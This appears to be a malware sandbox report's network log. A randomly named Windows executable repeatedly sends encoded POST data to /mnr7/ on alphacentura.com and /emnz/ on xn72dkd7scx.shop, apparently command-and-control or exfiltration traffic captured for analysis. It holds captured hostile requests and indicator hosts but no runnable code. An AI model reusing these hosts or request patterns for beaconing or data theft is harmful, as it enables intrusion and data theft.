                                                      Data Raw: 6c 76 2d 3d 6b 74 37 65 45 31 73 58 61 37 49 57 61 49 6f 68 34 72 58 72 31 64 61 74 2b 78 72 70 51 32 62 41 45 36 72 6c 6b 71 63 57 79 34 43 41 6d 4d 6a 4b 72 54 47 4e 71 55 58 6a 41 61 54 76 50 74 72 64 47 38 38 44 63 45 37 42 41 34 63 35 36 6f 30 77 34 45 33 39 72 4d 43 4e 58 2f 68 38 56 72 31 70 38 67 5a 49 4d 50 2b 43 52 32 65 4e 4f 53 43 41 59 4a 62 5a 50 6e 4a 47 62 73 76 4a 42 5a 71 4e 39 77 43 43 30 66 63 46 70 58 6f 75 30 46 32 33 52 79 53 68 73 4a 2b 35 43 47 6d 37 4e 33 2b 69 6e 76 62 43 79 78 33 54 72 4b 59 4a 45 4e 6b 71 73 36 6b 63 4a 38 74 66 39 58 79 53
                                                      Data Ascii: lv-=kt7eE1sXa7IWaIoh4rXr1dat+xrpQ2bAE6rlkqcWy4CAmMjKrTGNqUXjAaTvPtrdG88DcE7BA4c56o0w4E39rMCNX/h8Vr1p8gZIMP+CR2eNOSCAYJbZPnJGbsvJBZqN9wCC0fcFpXou0F23RyShsJ+5CGm7N3+invbCyx3TrKYJENkqs6kcJ8tf9XyS
                                                      Jul 9, 2024 12:08:48.320627928 CEST811INHTTP/1.1 200 OK
                                                      Date: Tue, 09 Jul 2024 10:08:48 GMT
                                                      Content-Type: text/html;charset=utf8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyyDm%2Fq7b1OcO09w%2B76Ik0K1rX2Tw3HJ0hhbCvjpta8iF5sbbaPhMiGi6Pxfv4ferChbSGxnznRIZZ51Wp53oIEkg%2FaZvdK%2BdPyzpMUVrXPr3%2FLdc54ptQkAGp%2FSUyC%2BN4NUrIyR6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0783cccd50c32d-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 b3 c9 4d 2d 49 54 48 ce 48 2c 2a 4e 2d b1 55 2a 2d 49 d3 b5 50 52 d0 b7 b3 29 c9 2c c9 49 b5 7b b6 b8 e1 d9 d6 ee 27 3b d6 da e8 43 04 6c 52 32 cb ec 5e 6c df fc 62 ef 1a b0 28 88 6b a3 0f 36 8a cb a6 38 b9 28 b3 a0 c4 4e a1 3c 33 2f 25 bf 5c 2f 27 3f 39 b1 24 33 3f 4f 2f a3 28 35 4d c1 56 49 3f 37 af c8 5c df 3e a9 a4 3c 31 cd d6 c4 d4 d2 cc dc d2 c2 42 c9 5a c1 46 1f aa 11 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 4e 5b 12 e4 94 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 93(M-ITHH,*N-U*-IPR),I{';ClR2^lb(k68(N<3/%\/'?9$3?O/(5MVI?7\><1BZFbN[0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.949721188.114.96.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:08:50.338512897 CEST859OUTPOST /mnr7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.alphacentura.com
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.alphacentura.com
                                                      Referer: http://www.alphacentura.com/mnr7/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6b 74 37 65 45 31 73 58 61 37 49 57 59 6f 59 68 30 71 58 72 77 39 61 75 78 52 72 70 48 6d 62 4d 45 36 6e 6c 6b 76 39 4c 79 72 71 41 6d 73 54 4b 71 58 79 4e 70 55 58 6a 59 71 54 75 4c 74 72 47 47 38 35 2b 63 42 62 42 41 35 34 35 36 70 6f 77 34 32 66 36 74 63 43 4c 43 50 68 2b 52 72 31 70 38 67 5a 49 4d 50 72 4b 52 32 47 4e 4f 69 79 41 4a 59 62 61 47 48 4a 46 52 4d 76 4a 58 70 71 4a 39 77 43 77 30 65 41 72 70 53 73 75 30 45 71 33 52 6a 53 69 6d 4a 2f 38 4e 6d 6e 37 4e 79 62 4f 71 65 66 33 79 41 66 66 34 35 55 56 4f 4d 45 30 39 49 74 48 63 72 74 34 36 77 37 36 79 73 77 45 6a 52 2b 6c 56 5a 63 58 71 79 76 45 54 6b 76 56 57 51 3d 3d
                                                      Data Ascii: lv-=kt7eE1sXa7IWYoYh0qXrw9auxRrpHmbME6nlkv9LyrqAmsTKqXyNpUXjYqTuLtrGG85+cBbBA5456pow42f6tcCLCPh+Rr1p8gZIMPrKR2GNOiyAJYbaGHJFRMvJXpqJ9wCw0eArpSsu0Eq3RjSimJ/8Nmn7NybOqef3yAff45UVOME09ItHcrt46w76yswEjR+lVZcXqyvETkvVWQ==
                                                      Jul 9, 2024 12:08:50.914962053 CEST806INHTTP/1.1 200 OK
                                                      Date: Tue, 09 Jul 2024 10:08:50 GMT
                                                      Content-Type: text/html;charset=utf8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7El2%2F07GBhFCrntaL3xv%2BS2o0ImHq0tvq68Tv%2FVj0Kz3PKRfGBaOd1q5w%2FjP0%2BpdhwgN1PTO%2FnmL6R%2BGkHfV6rIFhfAnJq4zJ57gTGZeJraLy7BhVzlrsWeAzTNb46ehhMKWi0o0zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0783dceeb819d7-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 b3 c9 4d 2d 49 54 48 ce 48 2c 2a 4e 2d b1 55 2a 2d 49 d3 b5 50 52 d0 b7 b3 29 c9 2c c9 49 b5 7b b6 b8 e1 d9 d6 ee 27 3b d6 da e8 43 04 6c 52 32 cb ec 5e 6c df fc 62 ef 1a b0 28 88 6b a3 0f 36 8a cb a6 38 b9 28 b3 a0 c4 4e a1 3c 33 2f 25 bf 5c 2f 27 3f 39 b1 24 33 3f 4f 2f a3 28 35 4d c1 56 49 3f 37 af c8 5c df 3e a9 a4 3c 31 cd d6 c4 c8 c4 d2 c0 d4 c2 4c c9 5a c1 46 1f aa 11 00 00 00 ff ff e3 02 00 89 33 29 88 94 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 9e(M-ITHH,*N-U*-IPR),I{';ClR2^lb(k68(N<3/%\/'?9$3?O/(5MVI?7\><1LZF3)0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.949722188.114.96.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:08:52.935950041 CEST1872OUTPOST /mnr7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.alphacentura.com
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.alphacentura.com
                                                      Referer: http://www.alphacentura.com/mnr7/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6b 74 37 65 45 31 73 58 61 37 49 57 59 6f 59 68 30 71 58 72 77 39 61 75 78 52 72 70 48 6d 62 4d 45 36 6e 6c 6b 76 39 4c 79 72 79 41 6d 2f 62 4b 72 32 79 4e 6f 55 58 6a 56 4b 54 72 4c 74 71 65 47 38 41 31 63 42 66 33 41 36 51 35 37 4c 4d 77 2b 43 4c 36 6a 63 43 4c 64 66 68 2f 56 72 30 30 38 67 49 44 4d 50 37 4b 52 32 47 4e 4f 67 71 41 5a 35 62 61 41 48 4a 47 62 73 76 7a 42 5a 72 63 39 77 4b 67 30 65 46 65 70 6d 59 75 31 6b 36 33 64 78 4b 69 67 5a 2f 79 49 6d 6e 56 4e 79 66 52 71 65 54 46 79 41 72 6d 34 35 73 56 44 59 5a 31 75 38 35 54 4e 6f 46 78 76 6a 53 5a 79 34 55 64 72 78 37 45 4a 37 77 72 7a 69 37 52 58 30 79 6b 4d 6f 36 32 30 39 62 69 42 77 4b 2f 30 4b 70 6c 6b 51 39 58 61 32 51 6e 51 67 71 38 77 78 4e 7a 51 66 51 2b 45 63 4c 4c 61 6f 61 72 79 42 77 6f 2f 53 44 78 47 38 4c 47 46 4c 41 6e 6f 30 4e 32 51 72 73 4b 62 34 4d 4f 72 71 79 53 32 72 4c 69 73 4b 36 4c 71 76 5a 51 46 41 69 54 58 33 71 66 39 37 74 49 4d 77 71 36 6a 50 51 6e 68 33 45 75 65 4f 61 79 43 42 47 5a 47 70 4d 63 35 43 [TRUNCATED]
                                                      Data Ascii: lv-=kt7eE1sXa7IWYoYh0qXrw9auxRrpHmbME6nlkv9LyryAm/bKr2yNoUXjVKTrLtqeG8A1cBf3A6Q57LMw+CL6jcCLdfh/Vr008gIDMP7KR2GNOgqAZ5baAHJGbsvzBZrc9wKg0eFepmYu1k63dxKigZ/yImnVNyfRqeTFyArm45sVDYZ1u85TNoFxvjSZy4Udrx7EJ7wrzi7RX0ykMo6209biBwK/0KplkQ9Xa2QnQgq8wxNzQfQ+EcLLaoaryBwo/SDxG8LGFLAno0N2QrsKb4MOrqyS2rLisK6LqvZQFAiTX3qf97tIMwq6jPQnh3EueOayCBGZGpMc5CYln+NfJkRG0OL4R1OzM973TG1Rbzc6/j9kGifdeVyy/z5hkD/7G6Z9nxDtHriS5GGAe6V3xwJp7Cj7JfwIuU87ao6SyosqpAxBkNi6rdrtCJE4o3aheAAOE6ZZfZlklH7nMy7Jz43eGDpxt/hOpuHv85spPih7lx/GV7RfcIP9xHT98x/mbwM9NA+L/IwvT4lR28+JyUpluJy1qFwFnZDH+bd20qGwxgPeYTHWXa88c/5aWtpAuoxrUE77QQAhJxCf/sAaRNJ8cbPJQ755ZAPJQ/Pmqtu/Ba3WpzWakuqeqRimyWB7yU//hAwogEcDbB8hduBA2Rikac6WpHwOG0+hSPLmHRXjHgfbH7f1cjk4CshKsqWDf/OJJVZB8uqMoNymNlZHWGtE4D2YF9gnx9NIJFOy+6wo82dJcyzRs7iKeFpsmJqCfdIqMq46egKUvRF08jUkEtdnwBqKekRBhCr/MK9ae9bSmn20ock9IR1v5+hFhKXgDVP8UmxhmE7RLu97/V9RrQqn7CPuzsm3Qw+CxggmIg+/h3pXpufvVGcS0GHys4toBlrMG/woEAzDDlbfXnbc90+BPNdMjiEY9NUjjQONHyyLxpB+wDEARQEWUVpePi5GCVu0LXod+A/wwKZx9E8OWY82T2BDAkRmOBbv+Dsul3+Eqfdu [TRUNCATED]
                                                      Jul 9, 2024 12:08:53.522047997 CEST799INHTTP/1.1 200 OK
                                                      Date: Tue, 09 Jul 2024 10:08:53 GMT
                                                      Content-Type: text/html;charset=utf8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8XFFI6yzM4wCZwfubeM2HSN1Fa9ywJbd8y4UYv7bfvm7p3AZsowbE3weRDNm80qXIXWJO4MjppU4hpIgH5bL2HBYzOvQ4sXigez50MlzDQ7jv%2BZZYibytAejbTLdYqaNI9nzXoCVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0783ed3aae41f5-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 b3 c9 4d 2d 49 54 48 ce 48 2c 2a 4e 2d b1 55 2a 2d 49 d3 b5 50 52 d0 b7 b3 29 c9 2c c9 49 b5 7b b6 b8 e1 d9 d6 ee 27 3b d6 da e8 43 04 6c 52 32 cb ec 5e 6c df fc 62 ef 1a b0 28 88 6b a3 0f 36 8a cb a6 38 b9 28 b3 a0 c4 4e a1 3c 33 2f 25 bf 5c 2f 27 3f 39 b1 24 33 3f 4f 2f a3 28 35 4d c1 56 49 3f 37 af c8 5c df 3e a9 a4 3c 31 cd d6 d8 d8 cc cc dc d8 c0 42 c9 5a c1 46 1f aa 11 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 a6 a0 73 71 94 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 93(M-ITHH,*N-U*-IPR),I{';ClR2^lb(k68(N<3/%\/'?9$3?O/(5MVI?7\><1BZFbsq0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.949723188.114.96.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:08:55.539602041 CEST568OUTGET /mnr7/?GJtTF=-FH8yJw&lv-=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxqOSodO53aJITzDoCBcybRFuSCV6gKg== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.alphacentura.com
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:08:56.068378925 CEST907INHTTP/1.1 200 OK
                                                      Date: Tue, 09 Jul 2024 10:08:56 GMT
                                                      Content-Type: text/html;charset=utf8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O7USX5nNn0nMOTM1XSRPfVuCAgnVTNHIQwXTN4cqFS%2FUt4q3n6mki0HutSv%2FZlAjdlhig4HSd%2FLOdrSroDziyecfvhS0Jua5GYvdRSaaYxFeYOLkwh9Ns6%2FcF71R3WKZfeAZptWQTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0783fd893b42ad-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 31 31 61 0d 0a 3c 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e6 a3 80 e6 b5 8b e4 b8 ad 3c 2f 74 69 74 6c 65 3e 3c 64 69 76 3e e8 b7 b3 e8 bd ac e4 b8 ad 3c 2f 64 69 76 3e 3c 2f 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 22 2f 6d 6e 72 37 2f 3f 47 4a 74 54 46 3d 2d 46 48 38 79 4a 77 26 6c 76 2d 3d 70 76 54 2b 48 42 39 59 52 4b 49 2b 50 4f 51 78 30 62 2f 4d 2f 75 62 67 78 68 71 70 61 45 58 32 42 5a 6a 4a 6b 62 73 4a 7a 61 58 35 6d 64 62 63 69 6e 36 4b 74 32 44 39 58 4f 6a 70 4a 75 76 6c 41 71 38 45 66 56 76 48 55 39 39 5a 2b 49 45 52 35 56 4c 78 71 4f 53 6f 64 4f 35 33 61 4a 49 54 7a 44 6f 43 42 63 79 62 52 46 75 53 43 56 36 67 4b 67 3d 3d 26 62 74 77 61 66 3d 36 32 33 37 38 31 34 31 22 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 11a<html><meta charset="utf-8" /><title></title><div></div></html><script> window.location.href ="/mnr7/?GJtTF=-FH8yJw&lv-=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxqOSodO53aJITzDoCBcybRFuSCV6gKg==&btwaf=62378141"; </script>10


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.949724134.122.138.60805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:02.725888014 CEST835OUTPOST /emnz/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.xn72dkd7scx.shop
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.xn72dkd7scx.shop
                                                      Referer: http://www.xn72dkd7scx.shop/emnz/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 71 39 32 67 32 33 45 38 4f 32 6d 2f 6b 4b 77 35 6b 48 4a 62 47 4b 37 6e 4f 50 53 75 7a 33 41 77 47 4b 52 33 61 6b 56 79 43 58 2f 33 77 33 55 51 61 4e 31 35 57 61 75 77 76 54 4d 7a 57 4b 69 38 4d 47 47 4b 30 47 43 33 79 42 48 74 35 47 57 76 59 53 2b 35 41 4d 53 70 4d 4b 6d 6f 56 58 4c 55 48 71 61 4b 4a 77 42 68 75 74 6c 2b 6c 78 66 75 4a 36 32 4d 69 6d 42 6c 34 33 47 33 45 57 78 31 4c 47 30 36 75 39 49 6a 32 59 78 44 43 63 50 77 4f 52 31 4c 43 59 6f 63 2f 67 46 79 39 4e 6b 31 69 67 66 30 36 6c 72 76 4d 6e 33 2b 35 56 35
                                                      Data Ascii: lv-=lDpH6KcNafvQsq92g23E8O2m/kKw5kHJbGK7nOPSuz3AwGKR3akVyCX/3w3UQaN15WauwvTMzWKi8MGGK0GC3yBHt5GWvYS+5AMSpMKmoVXLUHqaKJwBhutl+lxfuJ62MimBl43G3EWx1LG06u9Ij2YxDCcPwOR1LCYoc/gFy9Nk1igf06lrvMn3+5V5
                                                      Jul 9, 2024 12:09:03.473615885 CEST446INHTTP/1.1 301 Moved Permanently
                                                      Server: nginx/onex
                                                      Date: Tue, 09 Jul 2024 10:09:03 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.xn72dkd7scx.shop/emnz/
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.949725134.122.138.60805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:05.318238974 CEST859OUTPOST /emnz/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.xn72dkd7scx.shop
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.xn72dkd7scx.shop
                                                      Referer: http://www.xn72dkd7scx.shop/emnz/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 4f 35 32 74 33 33 45 37 75 32 6c 7a 45 4b 77 7a 45 48 4e 62 47 57 37 6e 4b 2f 43 75 47 6e 41 77 6e 36 52 32 62 6b 56 6e 43 58 2f 38 51 33 52 64 36 4e 2b 35 57 65 6d 77 76 66 4d 7a 53 71 69 38 49 4b 47 4a 48 75 42 78 69 42 46 6d 5a 47 55 68 34 53 2b 35 41 4d 53 70 49 69 4d 6f 55 7a 4c 54 30 43 61 4b 6f 77 43 69 75 74 69 2f 6c 78 66 6b 5a 36 36 4d 69 6d 7a 6c 38 32 6a 33 48 75 78 31 4a 4f 30 36 37 42 48 73 32 5a 36 64 79 64 74 30 39 73 45 54 7a 4d 64 52 4d 34 52 77 72 6f 41 32 44 41 42 6c 49 73 77 36 62 6e 51 35 65 63 52 4e 31 44 2f 31 48 64 38 64 49 49 79 42 2b 6d 78 6b 64 65 37 65 51 3d 3d
                                                      Data Ascii: lv-=lDpH6KcNafvQsO52t33E7u2lzEKwzEHNbGW7nK/CuGnAwn6R2bkVnCX/8Q3Rd6N+5WemwvfMzSqi8IKGJHuBxiBFmZGUh4S+5AMSpIiMoUzLT0CaKowCiuti/lxfkZ66Mimzl82j3Hux1JO067BHs2Z6dydt09sETzMdRM4RwroA2DABlIsw6bnQ5ecRN1D/1Hd8dIIyB+mxkde7eQ==
                                                      Jul 9, 2024 12:09:06.086818933 CEST446INHTTP/1.1 301 Moved Permanently
                                                      Server: nginx/onex
                                                      Date: Tue, 09 Jul 2024 10:09:05 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.xn72dkd7scx.shop/emnz/
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.949726134.122.138.60805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:07.931706905 CEST1872OUTPOST /emnz/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.xn72dkd7scx.shop
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.xn72dkd7scx.shop
                                                      Referer: http://www.xn72dkd7scx.shop/emnz/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 4f 35 32 74 33 33 45 37 75 32 6c 7a 45 4b 77 7a 45 48 4e 62 47 57 37 6e 4b 2f 43 75 46 48 41 77 56 79 52 32 34 4d 56 68 79 58 2f 78 77 33 51 64 36 4e 76 35 53 79 69 77 76 44 63 7a 51 53 69 2b 72 43 47 64 69 61 42 34 69 42 46 70 35 47 58 76 59 54 38 35 41 64 5a 70 4d 47 4d 6f 55 7a 4c 54 79 2b 61 4e 35 77 43 6b 75 74 6c 2b 6c 78 44 75 4a 36 65 4d 68 57 4a 6c 38 79 64 30 32 4f 78 37 4a 65 30 38 4a 70 48 68 32 5a 34 63 79 64 4c 30 39 67 66 54 79 67 76 52 4e 38 37 77 73 45 41 6d 30 46 57 2f 4d 30 61 6b 39 7a 36 2f 35 6f 74 41 78 44 5a 37 32 30 56 45 4a 41 42 41 71 79 2f 68 4f 50 4d 4a 41 44 78 79 65 47 41 4e 32 6e 39 64 54 34 4e 6f 55 66 46 72 57 6a 41 4f 4e 62 42 6d 4e 53 56 53 4d 4a 4d 44 75 43 53 6d 65 36 79 4e 47 67 73 67 6c 6c 45 57 4a 61 53 73 57 70 59 47 44 57 4f 4d 47 6e 65 46 4c 4e 56 35 30 4f 68 50 4c 33 34 63 62 41 54 6f 53 38 6f 73 58 6a 42 46 34 71 32 65 4b 76 4b 46 30 44 61 53 69 51 49 62 72 66 75 32 42 52 6b 31 66 2f 57 47 31 35 53 68 5a [TRUNCATED]
